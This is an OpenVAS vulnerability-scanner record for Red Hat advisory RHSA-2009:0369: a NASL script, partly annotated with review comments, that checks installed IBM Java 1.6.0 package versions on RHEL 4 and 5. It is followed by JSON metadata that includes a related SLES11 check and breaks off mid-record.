ID OPENVAS:136141256231063641 Type openvas Reporter Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com Modified 2018-04-06T00:00:00
Description
The remote host is missing updates announced in
advisory RHSA-2009:0369.
The IBM® 1.6.0 Java release includes the IBM Java 2 Runtime Environment
and the IBM Java 2 Software Development Kit.
This update fixes several vulnerabilities in the IBM Java 2 Runtime
Environment and the IBM Java 2 Software Development Kit. These
vulnerabilities are summarized on the IBM Security alerts page listed in
the References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,
CVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)
All users of java-1.6.0-ibm are advised to upgrade to these updated
packages, containing the IBM 1.6.0 SR4 Java release. All running instances
of IBM Java must be restarted for the update to take effect.
# OpenVAS Vulnerability Test
# $Id: RHSA_2009_0369.nasl 9350 2018-04-06 07:03:33Z cfischer $
# Description: Auto-generated from advisory RHSA-2009:0369 ()
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# or at your option, GNU General Public License version 3,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Loaded before the metadata block. Nothing in the visible script calls a
# function from it by name; presumably it supplies the revision-comparison
# helpers that pkg-lib-rpm.inc relies on -- confirm before removing.
include("revisions-lib.inc");
# Finding summary, excerpted from the vendor advisory. It lists the CVE ids the
# update addresses and states that running IBM Java instances must be
# restarted for the update to take effect.
tag_summary = "The remote host is missing updates announced in
advisory RHSA-2009:0369.
The IBM® 1.6.0 Java release includes the IBM Java 2 Runtime Environment
and the IBM Java 2 Software Development Kit.
This update fixes several vulnerabilities in the IBM Java 2 Runtime
Environment and the IBM Java 2 Software Development Kit. These
vulnerabilities are summarized on the IBM Security alerts page listed in
the References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,
CVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)
All users of java-1.6.0-ibm are advised to upgrade to these updated
packages, containing the IBM 1.6.0 SR4 Java release. All running instances
of IBM Java must be restarted for the update to take effect.";
# Remediation hint shown with the finding.
# NOTE(review): the text names only up2date, but the checks later in this
# script also cover the .el5 packages (rls "RHENT_5"). Red Hat Enterprise
# Linux 5 uses yum rather than up2date, so the hint is incomplete for those
# hosts.
tag_solution = "Please note that this update is available via
Red Hat Network. To use Red Hat Network, launch the Red
Hat Update Agent with the following command: up2date";
# Metadata registration. This branch runs when the scanner loads the script to
# collect its description; the exit(0) at the end stops it before any package
# check is performed.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.63641");
script_version("$Revision: 9350 $");
script_tag(name:"last_modification", value:"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $");
script_tag(name:"creation_date", value:"2009-03-31 19:20:21 +0200 (Tue, 31 Mar 2009)");
script_cve_id("CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5351", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358");
# One CVSS v2 score and vector for the whole advisory (network vector, low
# complexity, no authentication, complete C/I/A impact). The eight CVEs above
# are not scored individually here.
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_name("RedHat Security Advisory RHSA-2009:0369");
# Information-gathering category: the script only reads data about the host.
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com");
script_family("Red Hat Local Security Checks");
# Local check: it is only launched when the ssh/login/rhel and ssh/login/rpms
# knowledge-base keys exist -- presumably written by gather-package-list.nasl
# after an authenticated SSH login (confirm). Without credentials the script
# does not run, so a scan with no finding for this advisory is not evidence
# that the host is patched.
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/rhel", "ssh/login/rpms");
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
# Detection quality is that of a package-version comparison; the fix is a
# vendor-supplied update.
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name : "URL" , value : "http://rhn.redhat.com/errata/RHSA-2009-0369.html");
script_xref(name : "URL" , value : "http://www.redhat.com/security/updates/classification/#critical");
script_xref(name : "URL" , value : "http://www.ibm.com/developerworks/java/jdk/alerts/");
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-rpm.inc");

# Package check for RHSA-2009:0369. Every listed package is handed to
# isrpmvuln() together with the package build named by the advisory for that
# release, and each non-NULL result is appended to the report in list order.
#
# Only installed RPM versions are examined. The advisory summary also requires
# running IBM Java instances to be restarted after the update; this script
# does not check that, so a clean result says nothing about JVMs still
# running the old code.
res = "";
report = "";

# Packages checked with rls "RHENT_4" (build suffix ~1.6.0.4~1jpp.1.el4).
el4_pkgs = make_list("java-1.6.0-ibm",
                     "java-1.6.0-ibm-demo",
                     "java-1.6.0-ibm-devel",
                     "java-1.6.0-ibm-javacomm",
                     "java-1.6.0-ibm-jdbc",
                     "java-1.6.0-ibm-plugin",
                     "java-1.6.0-ibm-src");

foreach pkgname (el4_pkgs) {
  fixed_rpm = pkgname + "~1.6.0.4~1jpp.1.el4";
  res = isrpmvuln(pkg:pkgname, rpm:fixed_rpm, rls:"RHENT_4");
  if (res != NULL) {
    report += res;
  }
}

# Packages checked with rls "RHENT_5" (build suffix ~1.6.0.4~1jpp.1.el5).
# The accessibility subpackage is listed for this release only.
el5_pkgs = make_list("java-1.6.0-ibm",
                     "java-1.6.0-ibm-accessibility",
                     "java-1.6.0-ibm-demo",
                     "java-1.6.0-ibm-devel",
                     "java-1.6.0-ibm-javacomm",
                     "java-1.6.0-ibm-jdbc",
                     "java-1.6.0-ibm-plugin",
                     "java-1.6.0-ibm-src");

foreach pkgname (el5_pkgs) {
  fixed_rpm = pkgname + "~1.6.0.4~1jpp.1.el5";
  res = isrpmvuln(pkg:pkgname, rpm:fixed_rpm, rls:"RHENT_5");
  if (res != NULL) {
    report += res;
  }
}

# __pkg_match is not assigned anywhere in this file; presumably pkg-lib-rpm.inc
# sets it once a listed package is found on a matching release -- confirm.
# With an empty report and no match the script ends without any result.
if (report == "") {
  if (__pkg_match) {
    exit(99); # Not vulnerable.
  }
} else {
  security_message(data:report);
}
{"id": "OPENVAS:136141256231063641", "type": "openvas", "bulletinFamily": "scanner", "title": "RedHat Security Advisory RHSA-2009:0369", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0369.\n\nThe IBM\u00ae 1.6.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,\nCVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.", "published": "2009-03-31T00:00:00", "modified": "2018-04-06T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063641", "reporter": "Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com", "references": ["http://www.redhat.com/security/updates/classification/#critical", "http://www.ibm.com/developerworks/java/jdk/alerts/", "http://rhn.redhat.com/errata/RHSA-2009-0369.html"], "cvelist": ["CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5343", "CVE-2008-5357", "CVE-2008-5356", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5351"], "lastseen": "2018-04-06T11:38:51", "viewCount": 1, "enchantments": {"score": {"value": 9.7, "vector": "NONE", "modified": "2018-04-06T11:38:51", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:63641", "OPENVAS:835195", "OPENVAS:102041", "OPENVAS:65489", "OPENVAS:136141256231065907", "OPENVAS:136141256231065641", "OPENVAS:65641", "OPENVAS:1361412562310835195", "OPENVAS:136141256231063190", "OPENVAS:1361412562310102041"]}, {"type": "nessus", "idList": ["MACOSX_JAVA_10_5_UPDATE3.NASL", "SUN_JAVA_JRE_244986.NASL", "REDHAT-RHSA-2009-0369.NASL", "SUSE_JAVA-1_5_0-IBM-5960.NASL", "SUSE_JAVA-1_4_2-SUN-5852.NASL", "SUSE_11_JAVA-1_6_0-IBM-090405.NASL", "REDHAT-RHSA-2009-0016.NASL", "SUSE9_12336.NASL", "SUN_JAVA_JRE_244986_UNIX.NASL", "MACOSX_JAVA_REL8.NASL"]}, {"type": "redhat", "idList": ["RHSA-2008:1018", "RHSA-2009:0466", "RHSA-2009:0445", "RHSA-2009:0369", "RHSA-2009:0016", "RHSA-2008:1025"]}, {"type": "cve", "idList": ["CVE-2008-5342", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5356", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5343", "CVE-2008-5351"]}, {"type": "suse", "idList": ["SUSE-SA:2009:001", "SUSE-SA:2009:007", "SUSE-SA:2009:018"]}, {"type": "seebug", "idList": ["SSV:4532"]}, {"type": "vmware", "idList": ["VMSA-2009-0014"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9483", "SECURITYVULNS:DOC:21257"]}, {"type": "ubuntu", "idList": ["USN-713-1"]}, {"type": "gentoo", "idList": ["GLSA-200911-02"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2009-099563"]}], "modified": "2018-04-06T11:38:51", "rev": 2}, "vulnersScore": 9.7}, "pluginID": 
"136141256231063641", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0369.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0369 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0369.\n\nThe IBM\u00ae 1.6.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,\nCVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. 
All running instances\nof IBM Java must be restarted for the update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63641\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-31 19:20:21 +0200 (Tue, 31 Mar 2009)\");\n script_cve_id(\"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5351\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0369\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0369.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm\", rpm:\"java-1.6.0-ibm~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-demo\", rpm:\"java-1.6.0-ibm-demo~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-devel\", rpm:\"java-1.6.0-ibm-devel~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-javacomm\", rpm:\"java-1.6.0-ibm-javacomm~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-jdbc\", rpm:\"java-1.6.0-ibm-jdbc~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-plugin\", rpm:\"java-1.6.0-ibm-plugin~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-src\", rpm:\"java-1.6.0-ibm-src~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm\", rpm:\"java-1.6.0-ibm~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) 
{\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-accessibility\", rpm:\"java-1.6.0-ibm-accessibility~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-demo\", rpm:\"java-1.6.0-ibm-demo~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-devel\", rpm:\"java-1.6.0-ibm-devel~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-javacomm\", rpm:\"java-1.6.0-ibm-javacomm~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-jdbc\", rpm:\"java-1.6.0-ibm-jdbc~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-plugin\", rpm:\"java-1.6.0-ibm-plugin~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-src\", rpm:\"java-1.6.0-ibm-src~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "Red Hat Local Security Checks"}
{"openvas": [{"lastseen": "2017-07-27T10:56:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5343", "CVE-2008-5357", "CVE-2008-5356", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5351"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0369.\n\nThe IBM\u00ae 1.6.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,\nCVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-03-31T00:00:00", "id": "OPENVAS:63641", "href": "http://plugins.openvas.org/nasl.php?oid=63641", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:0369", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0369.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0369 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0369.\n\nThe IBM\u00ae 1.6.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,\nCVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. 
To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(63641);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-31 19:20:21 +0200 (Tue, 31 Mar 2009)\");\n script_cve_id(\"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5351\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0369\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0369.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm\", rpm:\"java-1.6.0-ibm~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-demo\", rpm:\"java-1.6.0-ibm-demo~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"java-1.6.0-ibm-devel\", rpm:\"java-1.6.0-ibm-devel~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-javacomm\", rpm:\"java-1.6.0-ibm-javacomm~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-jdbc\", rpm:\"java-1.6.0-ibm-jdbc~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-plugin\", rpm:\"java-1.6.0-ibm-plugin~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-src\", rpm:\"java-1.6.0-ibm-src~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm\", rpm:\"java-1.6.0-ibm~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-accessibility\", rpm:\"java-1.6.0-ibm-accessibility~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-demo\", rpm:\"java-1.6.0-ibm-demo~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-devel\", rpm:\"java-1.6.0-ibm-devel~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-javacomm\", rpm:\"java-1.6.0-ibm-javacomm~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-jdbc\", rpm:\"java-1.6.0-ibm-jdbc~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-plugin\", rpm:\"java-1.6.0-ibm-plugin~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-src\", rpm:\"java-1.6.0-ibm-src~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n 
security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5357", "CVE-2008-5356", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_6_0-ibm\n java-1_6_0-ibm-alsa\n java-1_6_0-ibm-fonts\n java-1_6_0-ibm-jdbc\n java-1_6_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-11T00:00:00", "id": "OPENVAS:136141256231065641", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065641", "type": "openvas", "title": "SLES11: Security update for IBM Java 1.6.0", "sourceData": "#\n#VID 7d9a96f54ebbdea55cd9630e7b8de703\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for IBM Java 1.6.0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_6_0-ibm\n java-1_6_0-ibm-alsa\n java-1_6_0-ibm-fonts\n java-1_6_0-ibm-jdbc\n java-1_6_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=489052\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.65641\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 22:58:51 +0200 (Sun, 11 Oct 2009)\");\n script_cve_id(\"CVE-2008-5341\", \"CVE-2008-5340\", \"CVE-2008-5351\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES11: Security update for IBM Java 1.6.0\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm\", rpm:\"java-1_6_0-ibm~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-alsa\", rpm:\"java-1_6_0-ibm-alsa~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-fonts\", rpm:\"java-1_6_0-ibm-fonts~1.6.0~124.6.1\", 